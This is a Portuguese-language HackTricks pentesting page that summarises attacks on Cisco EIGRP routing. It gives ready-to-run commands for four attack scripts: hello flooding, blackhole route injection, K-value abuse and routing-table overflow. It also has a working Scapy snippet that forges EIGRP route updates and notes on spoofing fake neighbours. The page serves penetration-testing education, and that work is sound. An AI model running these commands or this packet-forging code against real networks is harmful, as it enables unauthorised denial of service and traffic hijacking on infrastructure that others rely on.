Ataques EIGRP
Tip
Aprenda e pratique Hacking AWS:
HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP:HackTricks Training GCP Red Team Expert (GRTE)
Aprenda e pratique Hacking Azure:
HackTricks Training Azure Red Team Expert (AzRTE)
Supporte o HackTricks
- Confira os planos de assinatura!
- Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
- Compartilhe truques de hacking enviando PRs para o HackTricks e HackTricks Cloud repositórios do github.
Este é um resumo dos ataques expostos em https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9. Consulte-o para mais informações.
Ataque de Vizinhos Falsos EIGRP
- Objetivo: Sobrecarregar as CPUs dos roteadores ao inundá‑los com pacotes HELLO do EIGRP, potencialmente causando um ataque de Negação de Serviço (DoS).
- Tool: helloflooding.py script.
- Execution:
~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24
- Parameters:
--interface: Especifica a interface de rede, ex.:eth0.--as: Define o número do sistema autônomo (AS) do EIGRP, ex.:1.--subnet: Define a subrede alvo, ex.:10.10.100.0/24.
Ataque Blackhole EIGRP
- Objetivo: Interromper o fluxo de tráfego da rede injetando uma rota falsa, levando a um blackhole onde o tráfego é direcionado a um destino inexistente.
- Tool: routeinject.py script.
- Execution:
~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32
- Parameters:
--interface: Especifica a interface do sistema do atacante.--as: Define o número AS do EIGRP.--src: Define o endereço IP do atacante.--dst: Define o IP da subrede alvo.--prefix: Define a máscara (prefixo) do IP da subrede alvo.
Ataque de Abuso dos K-values
- Objetivo: Criar desconexões e reconexões contínuas dentro do domínio EIGRP ao injetar K-values alterados, resultando efetivamente em um DoS.
- Tool: relationshipnightmare.py script.
- Execution:
~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100
- Parameters:
--interface: Especifica a interface de rede.--as: Define o número AS do EIGRP.--src: Define o endereço IP de um roteador legítimo.
Ataque de Overflow da Tabela de Roteamento
- Objetivo: Sobrecarregar a CPU e a RAM do roteador ao inundar a tabela de roteamento com numerosas rotas falsas.
- Tool: routingtableoverflow.py script.
- Execution:
sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50
- Parameters:
--interface: Especifica a interface de rede.--as: Define o número AS do EIGRP.--src: Define o endereço IP do atacante.
Notas do Protocolo Úteis para Ataques
- Pacotes HELLO carregam os K-values e vizinhanças só se formam quando eles batem. Esta é a base para ataques de mismatch de K-values/ruptura de relacionamento e explica por que K-values diferentes impedem adjacência.
- O TLV PARAMETER (Type 0x0001) em HELLO (e no UPDATE inicial) carrega os K-values e o Hold Time, então capturas passivas revelam os valores exatos usados no segmento.
Criação de Pacotes com Scapy (Route Injection / Fake Neighbors)
Scapy inclui uma camada contrib EIGRP com TLVs como EIGRPParam e EIGRPIntRoute, o que é suficiente para confeccionar UPDATEs para injeção de rotas. Exemplo adaptado do davidbombal/scapy EIGRP route injection script:
from scapy.all import *
load_contrib("eigrp")
sendp(Ether()/IP(src="192.168.1.248", dst="224.0.0.10") /
EIGRP(opcode="Update", asn=100, seq=0, ack=0,
tlvlist=[EIGRPIntRoute(dst="192.168.100.0",
nexthop="192.168.1.248")]))
O mesmo repositório inclui scripts rápidos “fake neighbor” que capturam um pacote EIGRP real e o reproduzem com um spoofed source IP para criar vizinhos fantasma (útil para pressão na CPU/neighbor-table).
- Scapy EIGRP contrib docs: https://scapy.readthedocs.io/en/latest/api/scapy.contrib.eigrp.html
- Example scripts: https://github.com/davidbombal/scapy
Routopsy & NSE Helpers
- Routopsy cria um laboratório de ataque com roteador virtual (FRRouting + Scapy) e inclui ataques DRP que você pode adaptar para testes EIGRP. https://sensepost.com/blog/2020/routopsy-hacking-routing-with-routers/
- Nmap’s NSE has a small
eigrplibrary for parsing/generating a subset of EIGRP packets. https://nmap.org/nsedoc/lib/eigrp.html
Authentication Recon
- O modo nomeado do EIGRP suporta HMAC-SHA-256 authentication via
authentication mode hmac-sha-256 .... Se ativado, pacotes forjados devem ser autenticados com a chave correta; se não estiver ativado, spoofing/injection é mais fácil de validar.
References
- https://www.rfc-editor.org/rfc/rfc7868.html
- https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/iproute_eigrp/configuration/15-mt/ire-15-mt-book/ire-sha-256.html
Tip
Aprenda e pratique Hacking AWS:
HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP:HackTricks Training GCP Red Team Expert (GRTE)
Aprenda e pratique Hacking Azure:
HackTricks Training Azure Red Team Expert (AzRTE)
Supporte o HackTricks
- Confira os planos de assinatura!
- Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
- Compartilhe truques de hacking enviando PRs para o HackTricks e HackTricks Cloud repositórios do github.


